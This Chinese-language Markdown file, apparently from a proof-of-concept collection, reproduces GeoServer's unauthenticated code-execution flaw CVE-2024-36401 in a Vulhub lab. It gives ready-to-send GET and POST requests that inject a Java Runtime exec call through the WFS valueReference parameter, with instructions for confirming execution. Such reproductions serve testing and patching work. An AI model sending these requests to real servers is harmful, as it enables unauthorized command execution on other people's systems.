Awesome-POC/中间件漏洞/GeoServer 属性名表达式前台代码执行漏洞 CVE-2024-36401.md

102 lines
4.0 KiB
Markdown
Raw Normal View History

2024-11-06 14:10:36 +08:00
# GeoServer 属性名表达式前台代码执行漏洞 CVE-2024-36401
## 漏洞描述
GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现,利用 GeoServer 可以方便的发布地图数据,允许用户对特征数据进行更新、删除、插入操作。
在 GeoServer 2.25.1 2.24.3 2.23.5 版本及以前,未登录的任意用户可以通过构造恶意 OGC 请求,在默认安装的服务器中执行 XPath 表达式,进而利用执行 Apache Commons Jxpath 提供的功能执行任意代码。
参考链接:
- https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv
- https://github.com/geotools/geotools/security/advisories/GHSA-w3pj-wh35-fq8w
- https://tttang.com/archive/1771/
- https://github.com/Warxim/CVE-2022-41852
## 漏洞影响
```
GeoServer ≤ 2.23.5
2.24.0 <= GeoServer ≤ 2.24.3
2.25.0 <= GeoServer ≤ 2.25.1
```
## 环境搭建
Vulhub 执行如下命令启动一个 GeoServer 2.23.2 服务器:
```
docker compose up -d
```
服务启动后,你可以在 `http://your-ip:8080/geoserver` 查看到 GeoServer 的默认页面。
![](images/GeoServer%20属性名表达式前台代码执行漏洞%20CVE-2024-36401/image-20240704162257994.png)
## 漏洞复现
在官方 [漏洞通告](https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv) 中提到可以找到漏洞相关的 WFS 方法:
> No public PoC is provided but this vulnerability has been confirmed to be exploitable through WFS GetFeature, WFS GetPropertyValue, WMS GetMap, WMS GetFeatureInfo, WMS GetLegendGraphic and WPS Execute requests.
> 未提供公开 PoC但已确认可通过 WFS GetFeature、WFS GetPropertyValue、WMS GetMap、WMS GetFeatureInfo、WMS GetLegendGraphic 和 WPS Execute 利用此漏洞。
Vulhub 使用 `GetPropertyValue` 来执行 xpath 表达式,参考 [官方文档](https://github.com/geoserver/geoserver/blob/2.23.2/doc/en/user/source/services/wfs/reference.rst) 构造两个 POC。基于 GET 方法的 POC
```
GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),'touch%20/tmp/awesome_poc1') HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Connection: close
Cache-Control: max-age=0
```
![](images/GeoServer%20属性名表达式前台代码执行漏洞%20CVE-2024-36401/image-20240704162941141.png)
基于 POST 方法的 POC
```
POST /geoserver/wfs HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/xml
Content-Length: 356
<wfs:GetPropertyValue service='WFS' version='2.0.0'
xmlns:topp='http://www.openplans.org/topp'
xmlns:fes='http://www.opengis.net/fes/2.0'
xmlns:wfs='http://www.opengis.net/wfs/2.0'>
<wfs:Query typeNames='sf:archsites'/>
<wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'touch /tmp/awesome_poc2')</wfs:valueReference>
</wfs:GetPropertyValue>
```
![](images/GeoServer%20属性名表达式前台代码执行漏洞%20CVE-2024-36401/image-20240704163007780.png)
均触发 `java.lang.ClassCastException` 类型转换异常,命令执行成功。
进入容器验证 `touch /tmp/awesome_poc1``touch /tmp/awesome_poc2` 执行结果:
![](images/GeoServer%20属性名表达式前台代码执行漏洞%20CVE-2024-36401/image-20240704163120678.png)
Payload 中的 typeNames 必须存在,例如:
```
<wfs:Query typeNames='sf:archsites'/>
```
可以在 Web 页面中找到当前服务器中的所有 Types
```
http://your-ip:8080/geoserver/web/wicket/bookmarkable/org.geoserver.web.demo.MapPreviewPage?2&filter=false
```
![](images/GeoServer%20属性名表达式前台代码执行漏洞%20CVE-2024-36401/image-20240704163921580.png)